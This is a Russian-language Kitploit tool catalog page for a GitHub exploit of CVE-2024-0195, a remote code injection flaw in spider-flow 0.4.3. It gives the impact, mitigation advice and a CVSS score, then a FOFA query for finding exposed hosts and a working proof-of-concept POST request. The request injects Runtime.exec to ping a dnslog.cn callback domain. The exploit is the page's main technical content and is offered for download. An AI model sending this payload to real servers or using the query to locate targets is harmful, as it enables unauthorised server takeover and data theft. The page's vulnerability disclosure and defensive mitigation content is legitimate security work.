Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 Некорректный контроль генерации кода ('Внедрение кода') | Kitploit
Инструменты/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 Некорректный контроль генерации кода ('Внедрение кода')

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-0195 Некорректный контроль генерации кода (внедрение кода)

Краткое описание

CVE-2024-0195 — это критическая уязвимость внедрения кода в веб-приложении spider-flow 0.4.3, конкретно в функции FunctionService.saveFunction файла FunctionController.java. Злоумышленник может удалённо внедрить вредоносный код, который выполняется на сервере. Это позволяет полностью скомпрометировать приложение.

Воздействие

Эта уязвимость чрезвычайно опасна, так как позволяет удалённо выполнять код на сервере, на котором запущено уязвимое приложение spider-flow. Злоумышленник может полностью скомпрометировать сервер, похитить конфиденциальные данные, установить вредоносное ПО или криптомайнеры и использовать его для дальнейших атак внутри сети. Конфиденциальность, целостность и доступность приложения и сервера находятся под критическим воздействием.

Патч

Исправленная версия не указана явно, поэтому на данный момент установка патча не представляется возможной. Уязвимость была публично раскрыта, а эксплойты доступны, поэтому немедленное смягчение последствий имеет решающее значение.

Смягчение

До выхода официального патча spider-flow 0.4.3 следует немедленно отключить от сети или ограничить доступ только доверенными сетями/пользователями. В качестве временной меры можно настроить межсетевые экраны веб-приложений или другие средства контроля ввода для обнаружения и блокировки попыток внедрения кода. Однако это не является полным решением, и уязвимую версию следует обновить, как только станет доступен исправленный релиз.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Эксплуатация

FOFA : app="spiderflow"

✔ Доказательство концепции

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Скачать инструмент